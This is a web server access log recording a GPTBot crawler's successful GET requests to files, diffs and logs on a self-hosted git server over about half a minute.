git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 9893] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom4.png" -[17/Feb/2026:14:32:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/vite.config.ts?display=rendered" [Client 74.7.227.38] [Length 10877] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/vite.config.ts" -[17/Feb/2026:14:32:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/.gitignore?display=source" [Client 74.7.227.38] [Length 11474] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/.gitignore" -[17/Feb/2026:14:32:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/types.ts?display=rendered" [Client 74.7.227.38] [Length 10869] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/types.ts" -[17/Feb/2026:14:32:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/types.ts?display=source" [Client 74.7.227.38] [Length 11501] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/types.ts" -[17/Feb/2026:14:32:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/types.ts?display=source" [Client 74.7.227.38] [Length 11503] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/types.ts" -[17/Feb/2026:14:32:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/types.ts?display=source" [Client 74.7.227.38] [Length 11500] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/types.ts" -[17/Feb/2026:14:32:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/.gitignore?display=rendered" [Client 74.7.227.38] [Length 10868] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/.gitignore" -[17/Feb/2026:14:32:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/.gitignore?display=rendered" [Client 74.7.227.38] [Length 10868] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/.gitignore" -[17/Feb/2026:14:32:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build" [Client 74.7.227.38] [Length 10696] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm" -[17/Feb/2026:14:32:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 18933] [Gzip 14.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:14:32:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10065] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/progress.marks" -[17/Feb/2026:14:32:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10035] [Gzip 2.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/progress.marks" -[17/Feb/2026:14:32:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10066] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/progress.marks" -[17/Feb/2026:14:32:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 18901] [Gzip 14.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:14:32:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 18931] [Gzip 14.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:14:32:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject" [Client 74.7.227.38] [Length 9909] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject" -[17/Feb/2026:14:32:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv" [Client 74.7.227.38] [Length 9888] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv" -[17/Feb/2026:14:32:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv" [Client 74.7.227.38] [Length 9917] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv" -[17/Feb/2026:14:32:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/b288a964d15beae093be1af2456d67149d3aafa1?files=html%2fassets%2fjs" [Client 74.7.227.38] [Length 22437] [Gzip 4.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/js" -[17/Feb/2026:14:32:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build" [Client 74.7.227.38] [Length 10194] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build" -[17/Feb/2026:14:32:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app/models.py" [Client 74.7.227.38] [Length 10183] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app/models.py" -[17/Feb/2026:14:32:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app/fetcher.py" [Client 74.7.227.38] [Length 10351] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app/fetcher.py" -[17/Feb/2026:14:32:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app/calculator.py" [Client 74.7.227.38] [Length 9961] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app/calculator.py" -[17/Feb/2026:14:32:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/lib64" [Client 74.7.227.38] [Length 9929] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/lib64" -[17/Feb/2026:14:32:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app/database.py" [Client 74.7.227.38] [Length 9960] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app/database.py" -[17/Feb/2026:14:32:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/static/js" [Client 74.7.227.38] [Length 10174] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/static/js" -[17/Feb/2026:14:32:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/Dockerfile?display=source" [Client 74.7.227.38] [Length 11561] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/Dockerfile" -[17/Feb/2026:14:32:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2fdata%2fnginx" [Client 74.7.227.38] [Length 35607] [Gzip 8.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/nginx" -[17/Feb/2026:14:32:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2fdata%2flogs" [Client 74.7.227.38] [Length 285525] [Gzip 13.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs" -[17/Feb/2026:14:32:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?files=npm%2fdata%2fnginx" [Client 74.7.227.38] [Length 23995] [Gzip 5.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/nginx" -[17/Feb/2026:14:32:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?files=npm%2fdata%2flogs" [Client 74.7.227.38] [Length 57612] [Gzip 10.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs" -[17/Feb/2026:14:32:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/main.py" [Client 74.7.227.38] [Length 23719] [Gzip 11.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/main.py" -[17/Feb/2026:14:32:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/main.py" [Client 74.7.227.38] [Length 23753] [Gzip 11.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/main.py" -[17/Feb/2026:14:32:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-2_error.log" [Client 74.7.227.38] [Length 14402] [Gzip 4.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs" -[17/Feb/2026:14:32:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-1_error.log" [Client 74.7.227.38] [Length 16220] [Gzip 7.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs" -[17/Feb/2026:14:32:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-3_error.log" [Client 74.7.227.38] [Length 12857] [Gzip 3.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs" -[17/Feb/2026:14:32:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-4_error.log" [Client 74.7.227.38] [Length 19738] [Gzip 7.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs" -[17/Feb/2026:14:32:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/Dockerfile?display=rendered" [Client 74.7.227.38] [Length 10851] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/Dockerfile" -[17/Feb/2026:14:32:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?show-outdated=&style=split&whitespace=ignore-eol" [Client 74.7.227.38] [Length 84392] [Gzip 12.32] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?show-outdated=&style=split&whitespace=ignore-change" -[17/Feb/2026:14:32:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?show-outdated=&style=split&whitespace=ignore-eol" [Client 74.7.227.38] [Length 457921] [Gzip 15.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?show-outdated=&style=unified&whitespace=ignore-eol" -[17/Feb/2026:14:32:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?show-outdated=&style=split&whitespace=ignore-all" [Client 74.7.227.38] [Length 458479] [Gzip 15.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?show-outdated=&style=unified&whitespace=ignore-all" -[17/Feb/2026:14:32:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a?show-outdated=&style=split&whitespace=ignore-all" [Client 74.7.227.38] [Length 62489] [Gzip 12.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a?show-outdated=&style=split&whitespace=show-all" -[17/Feb/2026:14:32:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?show-outdated=&style=split&whitespace=ignore-all" [Client 74.7.227.38] [Length 84358] [Gzip 12.32] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?show-outdated=&style=split&whitespace=ignore-change" -[17/Feb/2026:14:32:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a?show-outdated=&style=split&whitespace=ignore-eol" [Client 74.7.227.38] [Length 62484] [Gzip 12.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a?show-outdated=&style=split&whitespace=show-all" -[17/Feb/2026:14:32:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-2_error.log" [Client 74.7.227.38] [Length 9940] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-2_error.log" -[17/Feb/2026:14:32:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-1_error.log" [Client 74.7.227.38] [Length 10167] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-1_error.log" -[17/Feb/2026:14:32:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-3_error.log" [Client 74.7.227.38] [Length 10168] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-3_error.log" -[17/Feb/2026:14:32:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-4_error.log" [Client 74.7.227.38] [Length 10309] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-4_error.log" -[17/Feb/2026:14:32:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-4_error.log" [Client 74.7.227.38] [Length 69548] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-4_error.log" -[17/Feb/2026:14:32:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-2_error.log" [Client 74.7.227.38] [Length 20991] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-2_error.log" -[17/Feb/2026:14:32:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-1_error.log" [Client 74.7.227.38] [Length 48135] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-1_error.log" -[17/Feb/2026:14:32:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-3_error.log" [Client 74.7.227.38] [Length 9453] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 